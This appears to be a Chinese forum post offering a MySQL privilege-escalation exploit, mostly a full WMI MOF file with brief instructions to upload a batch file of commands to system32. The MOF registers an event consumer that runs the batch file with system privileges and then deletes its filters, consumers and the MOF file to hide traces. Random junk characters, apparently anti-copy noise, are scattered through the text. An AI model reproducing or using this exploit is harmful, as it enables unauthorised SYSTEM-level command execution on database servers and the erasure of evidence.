Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
5 C9 C1 g' q, \
' z; S, _0 C$ q$ H1 I3 x& ]* v这个sql提权MOF需要运行 system下的文件，不能定义路径。
* c% }7 g% |3 u# k" j/ i3 P需要将要运行的命令写入到bat上传到system32目录，然后执行。

#pragma
                        namespace("\\\\.\\root\\cimv2")
9 r% [1 k4 Q6 ^' z2 t; U& k                        class
2 J  Q0 E. F' A) l+ V' J1 ?5 Y                        MyClass547
                        {           [key]
0 c' T, i5 S  \+ W7 Z' R  c& `' t2 J                        string
                        Name;
6 x" w: L+ K; Y$ N( k5 ^0 ^                        };
                        class
5 {- |8 a0 d2 m' |4 B# }                        ActiveScriptEventConsumer
& o) Q; y$ E+ ~5 F7 O  X/ J! m                        : __EventConsumer {          [key]
                        string
+ l# I) T4 a  }+ S                        Name;           [not_null]
, d7 t; d6 c" R. ~. a                        string
                        ScriptingEngine;           string
                        ScriptFileName;           [template]
! ?3 d% E4 L1 L* C& t! S4 n1 F                        string
                        ScriptText;         uint32 KillTimeout;
                        }; instance of __Win32Provider as $P {
                        Name
                        =
                        "ActiveScriptEventConsumer";     CLSID =
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
                        PerUserInitialization
+ i5 z% @5 u, X9 H& m+ i. J* t+ p                        = TRUE;
; f3 M) Z9 @5 x                        }; instance of __EventConsumerProviderRegistration {         Provider
                        = $P;         ConsumerClassNames
& {$ {. L) N. b1 L) Z                        =
                        {"ActiveScriptEventConsumer"};
+ W+ E6 B- v* q( e" n( {% L                        };
                        Instance of ActiveScriptEventConsumer
! }( _3 i- A" X4 Z( j) B' c) D9 j                        as $cons {         Name
                        =
                        "ASEC";         ScriptingEngine
5 r, m: I8 E* L  O+ ^                        =
8 H/ i( O* J5 z  c- n# E5 m. L& i                        "JScript";         ScriptText
. k, N& m0 U4 T" @                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
! B  ]1 j; I( l% r0 N( i                        Instance of ActiveScriptEventConsumer
( M: y5 D$ s2 `4 r                        as $cons2 {         Name
                        =
9 s& {6 h8 i7 b+ T+ k                        "qndASEC";         ScriptingEngine
. o- r: c; O9 d6 x1 e& @$ a                        =
# W6 p# I" X( G3 }. B                        "JScript";         ScriptText
4 g5 R: V9 [4 N4 |' C8 n                        =
9 I! c0 {! E) |) H9 d( v                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
, Z; M; D$ d( z                        }; instance of __EventFilter as $Filt {         Name
% A2 q, m- Y2 l+ p9 t, f                        =
6 ^) @% t; {6 P$ b9 H! V                        "instfilt";         Query
: p- Q. V! {; Z: a4 X0 M                        =
                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
                        =
; s5 l/ X$ v4 ~. [6 v7 V' Q                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
! L9 [6 H' O9 i* f; e5 ~                        =
                        "qndfilt";         Query
7 i' R7 c6 z1 l" t                        =
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
3 e! d6 \# g! s* ?+ |                        =
; A0 V2 F% J& E' P/ j4 ]4 C/ D4 ~                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
                        = $cons;         Filter
9 W2 W( V3 w8 n3 H+ b9 W0 h                        = $Filt;
7 `( j# g3 _- p% `                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
3 U4 H: E* [9 w. o8 J                        = $cons2;         Filter
                        = $Filt2;
                        }; instance of MyClass547
, ^9 J8 |& y5 a4 N                        as $MyClass {         Name
                        =
  i& v* Q9 _2 ~% o# T0 b7 w                        "ClassConsumer";
$ B5 `6 Q& j1 x1 T9 g" H. f                        };